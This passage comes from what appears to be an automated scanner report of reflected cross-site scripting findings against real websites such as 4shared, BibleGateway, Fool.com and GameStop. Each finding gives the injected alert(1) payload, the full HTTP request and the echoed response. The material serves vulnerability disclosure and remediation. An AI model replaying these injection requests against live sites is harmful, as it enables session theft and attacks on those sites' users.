od.w+';'+wsod.h+';'+wsod.loc+'?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/v%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/0/67/0%3B%7Esscs%3D%3fe68e9"-alert(1)-"8a80cfad75d">
...[SNIP]...

3.14. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5615436 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5615436

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d2d5"-alert(1)-"9f5aa2accd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5615436?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/v%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/0/67/0%3B%7Esscs%3D%3f&9d2d5"-alert(1)-"9f5aa2accd6=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 21 Apr 2011 12:45:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1767

   function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
           try { axo.AllowScriptAccess = 'always';    }
           catch(e) {return '6,0,0';}
       } catch(e) {}
       try {
           retu
...[SNIP]...
d.w+';'+wsod.h+';'+wsod.loc+'?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/v%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/0/67/0%3B%7Esscs%3D%3f&9d2d5"-alert(1)-"9f5aa2accd6=1">
...[SNIP]...

3.15. http://multiply.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://multiply.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 21f11><script>alert(1)</script>c44884b6561 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico21f11><script>alert(1)</script>c44884b6561 HTTP/1.1
Host: multiply.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: language=en

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 13:10:06 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: uid=A:1:U2FsdGVkX1-PCRgIMpvOVx3q2QQBaIMERgHjqEbjxIQTzvosx.jEgA%3d%3d:utbvlbaagycoogrsabthhbk; domain=multiply.com; path=/
Set-Cookie: session=1303391406:1303391406:1303391406:1::; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: initial_anon_referrer=; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: session=1303391406::1303391406:1::0; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: last_access=1303391406; domain=multiply.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa TAIa PSAa PSDa OUR NOR PHY UNI COM DEM PRE"
Expires: Wed, 13 Apr 2005 10:02:00 GMT
Pragma: no-cache
Cache-Control: max-age=0
Content-Type: text/html; charset=utf-8
X-Cache: MISS from multiply.com
Connection: close
Content-Length: 10953

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html id=html_tag>
<head>
<title> </title>
<link rel="SHORTCUT ICON" href="/favicon.ico">
<script
...[SNIP]...
<a class='select anon' href=http://multiply.com/user/signin?xurl=http://multiply.com/favicon.ico21f11><script>alert(1)</script>c44884b6561>
...[SNIP]...

3.16. https://theautomatedsystem.com/pub/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://theautomatedsystem.com
Path:	/pub/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5dbc"><script>alert(1)</script>ea7644aac6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pub/?ref=1&d5dbc"><script>alert(1)</script>ea7644aac6d=1 HTTP/1.1
Host: theautomatedsystem.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 18:31:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.8-pl2-gentoo
Set-Cookie: ref=1; expires=Thu, 21-Apr-2011 20:31:57 GMT
Set-Cookie: affil=deleted; expires=Wed, 21-Apr-2010 18:31:56 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-
...[SNIP]...
<form method="POST" action="/pub/?ref=1&d5dbc"><script>alert(1)</script>ea7644aac6d=1" name="login_form" autocomplete="off">
...[SNIP]...

3.17. https://theautomatedsystem.com/pub/ [ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://theautomatedsystem.com
Path:	/pub/

Issue detail

The value of the ref request parameter is copied into the HTML document as text between TITLE tags. The payload c2671</title><script>alert(1)</script>13bc7511e9b was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pub/?ref=1c2671</title><script>alert(1)</script>13bc7511e9b HTTP/1.1
Host: theautomatedsystem.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 18:31:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.8-pl2-gentoo
Set-Cookie: ref=1c2671%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E13bc7511e9b; expires=Thu, 21-Apr-2011 20:31:27 GMT
Set-Cookie: affil=deleted; expires=Wed, 21-Apr-2010 18:31:26 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-
...[SNIP]...
<title>American Internet Services(1c2671</title><script>alert(1)</script>13bc7511e9b) : Customer Login</title>
...[SNIP]...

3.18. https://theautomatedsystem.com/pub/ [ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://theautomatedsystem.com
Path:	/pub/

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 802e7"><script>alert(1)</script>9a40bda2f66 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pub/?ref=1802e7"><script>alert(1)</script>9a40bda2f66 HTTP/1.1
Host: theautomatedsystem.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 18:31:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.8-pl2-gentoo
Set-Cookie: ref=1802e7%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9a40bda2f66; expires=Thu, 21-Apr-2011 20:31:25 GMT
Set-Cookie: affil=deleted; expires=Wed, 21-Apr-2010 18:31:24 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-
...[SNIP]...
<form method="POST" action="/pub/?ref=1802e7"><script>alert(1)</script>9a40bda2f66" name="login_form" autocomplete="off">
...[SNIP]...

3.19. http://widgets.digg.com/buttons/count [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.digg.com
Path:	/buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 85da1<script>alert(1)</script>7755736c4ab was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///C%3A/cdn/examples/dork/http-injection/http-header-injection-cwe-113.html85da1<script>alert(1)</script>7755736c4ab HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Thu, 21 Apr 2011 13:31:46 GMT
Via: NS-CACHE: 100
Etag: "54b0fb9c29f1987745659eb494d50cda46ee0a42"
Content-Length: 163
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Thu, 21 Apr 2011 13:41:45 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///C:/cdn/examples/dork/http-injection/http-header-injection-cwe-113.html85da1<script>alert(1)</script>7755736c4ab", "diggs": 0});

3.20. http://www.4shared.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d09a"-alert(1)-"d07bd091b9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.ico8d09a"-alert(1)-"d07bd091b9a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 /favicon.ico8d09a"-alert(1)-"d07bd091b9a
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=98CAB05F77610F76850F8225CE9E97FB.dc329; Path=/
Content-Type: text/html;charset=UTF-8
Date: Thu, 21 Apr 2011 04:45:44 GMT
Content-Length: 34697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/favicon.ico8d09a"-alert(1)-"d07bd091b9a";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.21. http://www.4shared.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 496c2'-alert(1)-'c0050f8ab44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.ico496c2'-alert(1)-'c0050f8ab44 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 /favicon.ico496c2'-alert(1)-'c0050f8ab44
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1A5657636D93F6BF4ED083947AB9CEEC.dc330; Path=/
Content-Type: text/html;charset=UTF-8
Date: Thu, 21 Apr 2011 04:45:47 GMT
Content-Length: 35396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/favicon.ico496c2'-alert(1)-'c0050f8ab44',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

3.22. http://www.biblegateway.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.biblegateway.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 6bb46--><script>alert(1)</script>0680eee486 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico6bb46--><script>alert(1)</script>0680eee486 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biblegateway.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Thu, 21 Apr 2011 02:29:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
Set-Cookie: bg_id=3a6e63d0ec184b46d05c7823d5b7fc79; path=/; domain=.biblegateway.com
Content-Length: 18292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>BibleGateway.com - W
...[SNIP]...
<input type="text" size="40" name="request" value="/favicon.ico6bb46--><script>alert(1)</script>0680eee486" />
...[SNIP]...

3.23. http://www.biblegateway.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.biblegateway.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95815"><script>alert(1)</script>749e4bf1710 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico95815"><script>alert(1)</script>749e4bf1710 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biblegateway.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Thu, 21 Apr 2011 02:29:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
Set-Cookie: bg_id=2973fc74fde5982e323526242c03b3c2; path=/; domain=.biblegateway.com
Content-Length: 18292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>BibleGateway.com - W
...[SNIP]...
<input type="text" size="40" name="request" value="http://www.biblegateway.com/favicon.ico95815"><script>alert(1)</script>749e4bf1710" />
...[SNIP]...

3.24. http://www.education.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.education.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56287"%3b27769707a25 was submitted in the REST URL parameter 1. This input was echoed as 56287";27769707a25 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /favicon.ico56287"%3b27769707a25 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.education.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 21 Apr 2011 02:39:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Set-Cookie: e=e8lqark2eb4fi1d1uit3sop077; expires=Thu, 21-Apr-2011 12:39:30 GMT; path=/; domain=www.education.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: i=0; expires=Sun, 03-Jul-2011 02:39:30 GMT; path=/
Content-Length: 140390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="co
...[SNIP]...
<!--if(!s.pageName) s.pageName="Education.com | An Education & Child Development Site for Parents | Parenting & Educational Resource";
s.pageType="errorPage";
if(!s.channel) s.channel="favicon.ico56287";27769707a25";
s.prop5=Cookie.get('registered');
s.prop6=0;
s.prop7='organic';
s.eVar15='organic';
s.prop13='Home Page';
s.prop17='none';
s.campaign='';
s.prop18='web00';
if(Cookie.read&&Cookie.read('sevent', {pat
...[SNIP]...

3.25. http://www.fool.com/search/solr.aspx [sort parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.fool.com
Path:	/search/solr.aspx

Issue detail

The value of the sort request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8ca45'%20a%3db%209b5ccc19812 was submitted in the sort parameter. This input was echoed as 8ca45' a=b 9b5ccc19812 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search/solr.aspx?sort=8ca45'%20a%3db%209b5ccc19812&source=isesitlnk0000006 HTTP/1.1
Host: www.fool.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=isesitlnk0000006&fy=false&ybls=0; domain=.fool.com; path=/
Set-Cookie: Wookie=Ref=http%3a%2f%2fnone%2f; domain=.fool.com; expires=Fri, 22-Apr-2011 12:43:35 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: Tookie=T=30715127510012002755000652771218; domain=.fool.com; expires=Sun, 18-Apr-2021 04:00:00 GMT; path=/
X-Powered-By: ASP.NET
Set-Cookie: v1st=330F12D0149324C1; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.fool.com
Date: Thu, 21 Apr 2011 12:43:34 GMT
Content-Length: 24749

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head><title>
Searching for: | Fool.com |
...[SNIP]...
<input type="hidden" name="sort" value='8ca45' a=b 9b5ccc19812' />
...[SNIP]...

3.26. http://www.fool.com/search/solr.aspx [sort parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.fool.com
Path:	/search/solr.aspx

Issue detail

The value of the sort request parameter is copied into the name of an HTML tag attribute. The payload 1ff2a%20a%3db52d128c7f6 was submitted in the sort parameter. This input was echoed as 1ff2a a=b52d128c7f6 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search/solr.aspx?sort=%27%22%20ns=%20netsparker(0x0010B4)%201ff2a%20a%3db52d128c7f6&source=isesitlnk0000006 HTTP/1.1
Host: www.fool.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=isesitlnk0000006&fy=false&ybls=0; domain=.fool.com; path=/
Set-Cookie: Wookie=Ref=http%3a%2f%2fnone%2f; domain=.fool.com; expires=Fri, 22-Apr-2011 12:43:34 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: Tookie=T=06364241275511560134413168561121; domain=.fool.com; expires=Sun, 18-Apr-2021 04:00:00 GMT; path=/
X-Powered-By: ASP.NET
Set-Cookie: v1st=6B80523439EA3D75; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.fool.com
Date: Thu, 21 Apr 2011 12:43:34 GMT
Content-Length: 24839

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head><title>
Searching for: | Fool.com |
...[SNIP]...
<input type="hidden" name="sort" value=''" ns= netsparker(0x0010B4) 1ff2a a=b52d128c7f6' />
...[SNIP]...

3.27. http://www.fool.com/search/solr.aspx [source parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.fool.com
Path:	/search/solr.aspx

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1edcb"><a%20b%3dc>0969aa4ca6c was submitted in the source parameter. This input was echoed as 1edcb"><a b=c>0969aa4ca6c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search/solr.aspx?sort=%27%22%20ns=%20netsparker(0x0010B4)%20&source=isesitlnk00000061edcb"><a%20b%3dc>0969aa4ca6c HTTP/1.1
Host: www.fool.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=isesitlnk00000061edcb"><a b=c>0969aa4ca6c&fy=false&ybls=0; domain=.fool.com; path=/
Set-Cookie: Wookie=Ref=http%3a%2f%2fnone%2f; domain=.fool.com; expires=Fri, 22-Apr-2011 12:43:38 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: Tookie=T=80258210505843124324378547410384; domain=.fool.com; expires=Sun, 18-Apr-2021 04:00:00 GMT; path=/
X-Powered-By: ASP.NET
Set-Cookie: v1st=49A89737192F048; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.fool.com
Date: Thu, 21 Apr 2011 12:43:37 GMT
Content-Length: 24911

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head><title>
Searching for: | Fool.com |
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/usmf.cont.searchresults/searchresults;pos=;seg=default;src=isesitlnk00000061edcb"><a b=c>0969aa4ca6c;sz=3x3;sub=default;port=default;trades=default;reg=false;uid=0;ticker=default;ret=default;mgr=default;funds=default;type=default;tile=13;ord=90983196?">
...[SNIP]...

3.28. http://www.gamestop.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.gamestop.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1d615'a%3d'b'34949f6bd8 was submitted in the REST URL parameter 1. This input was echoed as 1d615'a='b'34949f6bd8 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico1d615'a%3d'b'34949f6bd8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamestop.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
